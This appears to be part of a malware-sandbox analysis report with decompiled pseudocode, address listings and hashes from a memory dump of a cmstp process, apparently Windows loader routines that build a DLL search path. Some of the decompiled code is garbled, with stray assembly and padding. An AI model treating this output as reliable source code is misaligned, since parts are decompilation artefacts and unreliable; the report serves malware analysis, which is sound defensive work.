											L0512DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0511B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0511B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0511E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0511A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x050db171
0x050db171
0x050db171
0x050db171
0x050db171
0x050db176
0x050db17b
0x050db180
0x050db186
0x050db18f
0x050db198
0x050db1a4
0x050db1aa
0x05134802
0x05134802
0x05134805
0x0513480c
0x0513480e
0x050db1d1
0x050db1d3
0x050db1de
0x050db1de
0x05134817
0x0513481e
0x05134820
0x05134822
0x05134822
0x05134824
0x05134824
0x0513482a
0x00000000
0x00000000
0x05134835
0x0513483a
0x0513483d
0x0513483f
0x05134842
0x05134842
0x05134842
0x05134846
0x0513484c
0x0513484e
0x05134851
0x05134851
0x05134853
0x05134854
0x05134854
0x05134858
0x0513485a
0x0513485a
0x0513485d
0x0513485f
0x05134861
0x05134861
0x05134866
0x0513486b
0x0513486e
0x05134871
0x05134876
0x05134876
0x05134878
0x0513487b
0x05134884
0x05134884
0x00000000
0x0513487d
0x0513487d
0x05134882
0x05134889
0x05134889
0x0513488f
0x05134891
0x051348e0
0x051348e2
0x051348e4
0x051348e4
0x051348e7
0x051348e7
0x051348ed
0x051348f4
0x051348f6
0x05134951
0x05134951
0x05134953
0x05134953
0x05134956
0x05134956
0x05134958
0x05134959
0x05134959
0x0513495d
0x0513495d
0x0513495f
0x0513495f
0x05134965
0x05134969
0x051349ba
0x051349ba
0x051349c1
0x051349c5
0x051349cc
0x051349d4
0x051349d7
0x051349da
0x051349e4
0x051349e5
0x051349f3
0x05134a02
0x00000000
0x05134a02
0x05134972
0x05134974
0x00000000
0x00000000
0x05134976
0x05134979
0x05134982
0x05134983
0x05134984
0x0513498b
0x0513498d
0x05134991
0x05134993
0x05134999
0x0513499d
0x051349a2
0x051349a2
0x051349a2
0x05134999
0x051349ac
0x00000000
0x051349b3
0x051348f8
0x051348fe
0x00000000
0x00000000
0x00000000
0x051348fe
0x05134895
0x0513489c
0x051348ad
0x051348b2
0x051348b5
0x051348b7
0x051348ba
0x051348bc
0x051348c6
0x051348c6
0x051348cb
0x051348d1
0x051348d4
0x051348d8
0x051348d8
0x00000000
0x051348d8
0x051348be
0x051348c0
0x00000000
0x00000000
0x051348c2
0x00000000
0x00000000
0x00000000
0x051348c4
0x00000000
0x05134882
0x0513487b
0x05134904
0x05134906
0x00000000
0x00000000
0x05134908
0x0513490e
0x00000000
0x00000000
0x05134910
0x05134917
0x05134917
0x00000000
0x05134917
0x050db1ba
0x051347f9
0x051347fc
0x00000000
0x00000000
0x00000000
0x051347fc
0x050db1c0
0x050db1c0
0x050db1c3
0x050db1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 051348AD

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 7b927136d5a8310fdfac6afc9bba842135fcf394c1415a281fa14b290591f674
Instruction ID: a2ce066c4e6d37942f53f27211ebb9006273068369798fcd05ed95098744c37d
Opcode Fuzzy Hash: 7b927136d5a8310fdfac6afc9bba842135fcf394c1415a281fa14b290591f674
Instruction Fuzzy Hash: 3E51E075E04269CEDF35CFA4C86ABBEBBB1BF04710F1141E9D859AB282D7B049458F90

Uniqueness

Uniqueness Score: -1.00%

Function 05102581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E05102581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				intOrPtr* _t236;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				intOrPtr _t275;
				signed int _t277;
				signed int _t279;
				void* _t280;
				signed int _t281;
				unsigned int _t284;
				signed int _t288;
				signed int _t291;
				signed int _t295;
				intOrPtr _t308;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t325;
				void* _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				intOrPtr* _t334;
				void* _t336;

				_t331 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x51cd360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t324 = 0x51cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t284 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t275 = 0x48;
				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t317 = 0;
				_v37 = _t305;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t325 = 0xc0000106;
						goto L32;
					} else {
						_t324 = L050F4620(_t284,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t324;
						__eflags = _t324;
						if(_t324 == 0) {
							_t325 = 0xc0000017;
							goto L32;
						} else {
							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
							_t50 = _t324 + 0x48; // 0x48
							_t319 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t324 + 0x3c)) = _t275;
							_t277 = 0;
							 *((short*)(_t324 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t324 + 0x18) = _t319;
								__eflags = _t305 - 0x51c8478;
								 *_t324 = ((0 | _t305 == 0x051c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0511F3E0(_t319,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t334 = _t334 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t319 = _t319 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E051639F2(_t319);
									_t305 = _v32;
									_t319 = _t269;
								}
							}
							_t288 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t325 = _v68;
								__eflags = 0;
								 *((short*)(_t319 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t324 + _t277 * 4;
								_v56 = _t279;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t230 =  *(_v60 + _t288 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t288 * 4);
										 *(_t279 + 0x18) = _t319;
										_t234 =  *(_v60 + _t288 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M05102959))) {
												case 0:
													__ax =  *0x51c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0511F3E0(__edi,  *0x51c848c, __ax & 0x0000ffff);
														__eax =  *0x51c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0511F3E0(_t319, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x51c8480 & 0x0000ffff = E0511F3E0(__edi,  *0x51c8484,  *0x51c8480 & 0x0000ffff);
													__eax =  *0x51c8480 & 0x0000ffff;
													__eax = ( *0x51c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0511F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0511F3E0(_t319, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t319 = _t319 + (_t264 >> 1) * 2 + 2;
													__eflags = _t319;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t319 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0511F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x51c8478 & 0x0000ffff = E0511F3E0(__edi,  *0x51c847c,  *0x51c8478 & 0x0000ffff);
													__eax =  *0x51c8478 & 0x0000ffff;
													__eax = ( *0x51c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E051639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x51c6e58 & 0x0000ffff = E0511F3E0(__edi,  *0x51c6e5c,  *0x51c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x51c6e58 & 0x0000ffff;
													__eax = ( *0x51c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t288 = _v16;
													_t305 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t288 = _t288 + 1;
									_v16 = _t288;
									__eflags = _t288 - _v48;
								} while (_t288 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t317 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M05102935))) {
							case 0:
								__ax =  *0x51c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E05102E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x51c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x51c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E050EEEF0(0x51c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E050EEB70(__ecx, 0x51c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t325;
												if(_t325 < 0) {
													L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t284 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x51c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E050EEB70(__ecx, 0x51c79a0);
										__eax = _v52;
										L36:
										_pop(_t318);
										_pop(_t326);
										__eflags = _v8 ^ _t331;
										_pop(_t276);
										return E0511B640(_t209, _t276, _v8 ^ _t331, _t305, _t318, _t326);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t273 = E05102E3E(_t271,  &_v36);
									_t284 = _v36;
									_v76 = _t273;
								}
								if(_t284 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t284;
								}
								goto L14;
							case 6:
								__eax =  *0x51c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x51c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x51c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x51c6e58 & 0x0000ffff;
								__eax = ( *0x51c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t317 = _t317 + 1;
								if(_t317 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("adc [0x5102866], al");
					asm("loopne 0x29");
					asm("adc [0x510262e], al");
					 *_t234 =  *_t234 - _t305;
					ds = 0x25;
					_pop(_t280);
					asm("adc al, 0x5");
					_t236 = _t334;
					_t336 = _t234 + 0x5102605;
					 *_t236 =  *_t236 - _t305;
					_t237 = _t236 + 0x5145b35;
					asm("adc [0x5102880], al");
					asm("adc [0x510281e], al");
					_t328 = _t324 + 1 - 1;
					 *((_t236 + 0x5145b35) *  *_t319) =  *((_t236 + 0x5145b35) *  *_t319) - (_t237 *  *_t319 >> 0x20);
					asm("fcomp dword [ebx+0x14]");
					asm("adc al, 0x5");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x51aff00);
					E0512D08C(_t280, _t319, _t328);
					_v44 =  *[fs:0x18];
					_t320 = 0;
					 *_a24 = 0;
					_t281 = _a12;
					__eflags = _t281;
					if(_t281 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t295 = _t246 * 0xc;
							_v48 = _t295;
							__eflags = _t281 -  *((intOrPtr*)(_t295 + 0x50b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E0511E5C0(_a8,  *((intOrPtr*)(_t295 + 0x50b1668)), _t281);
									_t336 = _t336 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t329 = E051551BE(_t281,  *((intOrPtr*)(_v48 + 0x50b166c)), _a16, _t320, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t320;
									if( *_t291 == _t320) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
										_t308 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t308 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
											__eflags =  *(_t308 + 0x1c);
											if( *(_t308 + 0x1c) == 0) {
												L106:
												_t329 = E05102AE4( &_v36, _a8, _t281, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t320 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t251 = E050E6600( *(_t308 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E05102C50(_t291, _a8, _t281, _a16, _a20, _a24, _t320);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E050EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t258 = E05102AE4( &_v36, _a8, _t281, _a16, _a20, _t329);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E05102C50(_v36, _a8, _t281, _a16, _a20, _t329, 1);
									}
									_v8 = _t320;
									E05102ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t329;
					}
					L70:
					return E0512D0D1(_t244);
				}
				L108:
			}

0x05102584
0x05102586
0x05102590
0x05102596
0x05102597
0x05102598
0x05102599
0x0510259e
0x051025a4
0x051025a9
0x051025ac
0x051025ae
0x051025b1
0x051025b2
0x051025b5
0x051025b8
0x051025bb
0x051025bc
0x051025bf
0x051025c2
0x051025c5
0x051025c6
0x051025cb
0x051025ce
0x051025d8
0x051025dd
0x051025de
0x051025e1
0x051025e3
0x051025e9
0x051026da
0x051026da
0x051026dd
0x051026e2
0x05145b56
0x00000000
0x051026e8
0x051026f9
0x051026fb
0x051026fe
0x05102700
0x05145b60
0x00000000
0x05102706
0x05102706
0x0510270a
0x0510270a
0x0510270d
0x05102713
0x05102716
0x05102718
0x0510271c
0x0510271e
0x05145b6c
0x05145b6f
0x05145b7f
0x05145b89
0x05145b8e
0x05145b93
0x05145b96
0x05145b9c
0x05145ba0
0x05145ba3
0x05145bab
0x05145bb0
0x05145bb3
0x05145bb3
0x05145ba3
0x05102724
0x05102726
0x05102729
0x0510272c
0x0510279d
0x0510279d
0x051027a0
0x051027a2
0x00000000
0x0510272e
0x0510272e
0x05102731
0x05102734
0x05102734
0x05102736
0x05145bc1
0x05145bc1
0x05145bc4
0x00000000
0x05145bca
0x05145bca
0x05145bcd
0x00000000
0x05145bd3
0x00000000
0x05145bd3
0x05145bcd
0x0510273c
0x0510273c
0x05102742
0x05102747
0x0510274a
0x0510274d
0x05102750
0x00000000
0x05102756
0x05102756
0x00000000
0x05102902
0x05102908
0x0510290b
0x00000000
0x05102911
0x0510291c
0x05102921
0x00000000
0x05102921
0x00000000
0x00000000
0x05102880
0x05102887
0x0510288c
0x00000000
0x00000000
0x05102805
0x0510280a
0x05102814
0x05102816
0x00000000
0x00000000
0x0510281e
0x05102821
0x05102823
0x00000000
0x05102829
0x05102829
0x05102831
0x0510283c
0x0510283e
0x00000000
0x0510283e
0x00000000
0x00000000
0x0510284e
0x05102850
0x05102851
0x05102854
0x05102857
0x0510285a
0x0510285c
0x0510285d
0x00000000
0x00000000
0x0510275d
0x05102761
0x00000000
0x05102767
0x0510276e
0x05102773
0x05102773
0x05102776
0x05102778
0x0510277e
0x0510277e
0x05102781
0x05102781
0x05102783
0x05102784
0x00000000
0x00000000
0x05145bd8
0x05145bde
0x05145be4
0x05145be6
0x05145be8
0x05145be9
0x05145bee
0x05145bf8
0x05145bff
0x05145c01
0x05145c04
0x05145c07
0x05145c0b
0x05145c0d
0x05145c0d
0x05145c15
0x05145c18
0x05145c1b
0x05145c1b
0x05145c1e
0x00000000
0x00000000
0x051028c3
0x051028c8
0x051028d2
0x051028d4
0x051028d8
0x051028db
0x05145c26
0x05145c28
0x05145c2d
0x05145c2d
0x00000000
0x00000000
0x05145c34
0x05145c36
0x05145c49
0x05145c4e
0x05145c54
0x05145c5b
0x05145c5d
0x05145c60
0x05102788
0x05102788
0x0510278b
0x0510278e
0x0510278e
0x0510278e
0x05102791
0x00000000
0x00000000
0x05102756
0x05102750
0x00000000
0x05102794
0x05102794
0x05102795
0x05102798
0x05102798
0x00000000
0x05102734
0x0510272c
0x05102700
0x051025ef
0x051025ef
0x051025ef
0x051025f2
0x051025f8
0x00000000
0x00000000
0x051025fe
0x00000000
0x051028e6
0x051028ec
0x051028ef
0x051028f5
0x051028f8
0x051028f8
0x00000000
0x051028f8
0x00000000
0x00000000
0x05102866
0x05102866
0x05102876
0x05102879
0x00000000
0x00000000
0x051027e0
0x051027e7
0x051027e9
0x051027eb
0x05145afd
0x00000000
0x05145afd
0x00000000
0x00000000
0x05102633
0x05102638
0x0510263b
0x0510263c
0x0510263e
0x05102640
0x05102642
0x05102647
0x05102649
0x0510264e
0x05102650
0x05102653
0x05102659
0x051026a2
0x051026a7
0x051026ac
0x051026b2
0x05145b11
0x05145b15
0x05145b17
0x00000000
0x051026b8
0x051026b8
0x051026ba
0x051027a6
0x051027a6
0x051027a9
0x051027ab
0x051027b9
0x051027b9
0x051027be
0x051027c1
0x051027c3
0x051027c5
0x051027c7
0x05145c74
0x05145c79
0x05145c79
0x051027c7
0x00000000
0x051026c0
0x051026c0
0x051026c3
0x051026c6
0x051026c6
0x051026c9
0x051026c9
0x00000000
0x051026c9
0x051026ba
0x0510265b
0x0510265b
0x0510265e
0x05102667
0x0510266d
0x05102677
0x0510267c
0x0510267f
0x05102681
0x05145b49
0x05145b4e
0x051027cd
0x051027d0
0x051027d1
0x051027d2
0x051027d4
0x051027dd
0x05102687
0x05102687
0x0510268a
0x0510268b
0x0510268e
0x0510268f
0x05102691
0x05102696
0x05102698
0x0510269d
0x0510269f
0x00000000
0x0510269f
0x05102681
0x00000000
0x00000000
0x05102846
0x00000000
0x00000000
0x05102605
0x0510260a
0x0510260c
0x05102611
0x05102616
0x05102619
0x05102619
0x0510261e
0x00000000
0x05102624
0x05102627
0x05102627
0x00000000
0x00000000
0x05145b1f
0x00000000
0x00000000
0x05102894
0x0510289b
0x0510289d
0x051028a1
0x05145b2b
0x05145b2e
0x05145b2e
0x051028a7
0x051028a9
0x05145b04
0x05145b09
0x05145b09
0x05145b09
0x00000000
0x00000000
0x05145b35
0x05145b3c
0x051028fb
0x051028fb
0x051026cc
0x051026cc
0x051026d0
0x00000000
0x051026d2
0x051026d2
0x00000000
0x051026d2
0x00000000
0x00000000
0x051025fe
0x0510292d
0x05102930
0x05102935
0x05102937
0x0510293d
0x0510293f
0x05102946
0x0510294d
0x0510294e
0x0510294f
0x05102951
0x05102951
0x05102952
0x05102954
0x0510295b
0x05102963
0x05102969
0x0510296a
0x05102971
0x0510297b
0x0510297d
0x0510297e
0x0510297f
0x05102980
0x05102981
0x05102982
0x05102983
0x05102984
0x05102985
0x05102986
0x05102987
0x05102988
0x05102989
0x0510298a
0x0510298b
0x0510298c
0x0510298d
0x0510298e
0x0510298f
0x05102990
0x05102992
0x05102997
0x051029a3
0x051029a6
0x051029ab
0x051029ad
0x051029b0
0x051029b2
0x05145c80
0x051029b8
0x051029b8
0x051029bb
0x051029c0
0x051029c5
0x051029c6
0x051029c6
0x051029c9
0x051029cb
0x00000000
0x00000000
0x051029cd
0x051029d0
0x051029d9
0x051029db
0x051029dd
0x05102a7f
0x05102a84
0x05102a87
0x05102a89
0x05145ca1
0x05145ca3
0x00000000
0x05102a8f
0x05102a8f
0x00000000
0x05102a8f
0x00000000
0x051029e3
0x051029e3
0x051029e3
0x00000000
0x051029e3
0x051029dd
0x00000000
0x051029db
0x051029e6
0x051029e9
0x051029eb
0x051029ed
0x051029f3
0x051029f5
0x051029f8
0x051029fa
0x05102a97
0x05102a9a
0x05102a9d
0x05102add
0x00000000
0x05102a9f
0x05102aa2
0x05102aa5
0x05102aa8
0x05102aab
0x05145cab
0x05145caf
0x05145cc5
0x05145cda
0x05145cdc
0x05145cdf
0x05145ce5
0x00000000
0x05145ceb
0x05145ced
0x05145cee
0x00000000
0x05145cee
0x05145cb1
0x05145cb4
0x05145cb9
0x05145cbb
0x00000000
0x05145cbd
0x05145cbd
0x00000000
0x05145cbd
0x05145cbb
0x05102ab1
0x05102ab1
0x05102ac4
0x05102ac6
0x05102ac6
0x00000000
0x05102ac6
0x05102aab
0x00000000
0x05102a00
0x05102a09
0x05102a0e
0x05102a21
0x05102a24
0x05102a35
0x05102a3a
0x05102a3d
0x05102a42
0x05102a59
0x05102a59
0x05102a5c
0x05102a5f
0x05102a5f
0x051029fa
0x051029f3
0x05102a64
0x05102a64
0x05102a6b
0x05102a6b
0x05102a6d
0x05102a72
0x05102a72
0x00000000

Strings

PATH, xrefs: 05102642, 05102691

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
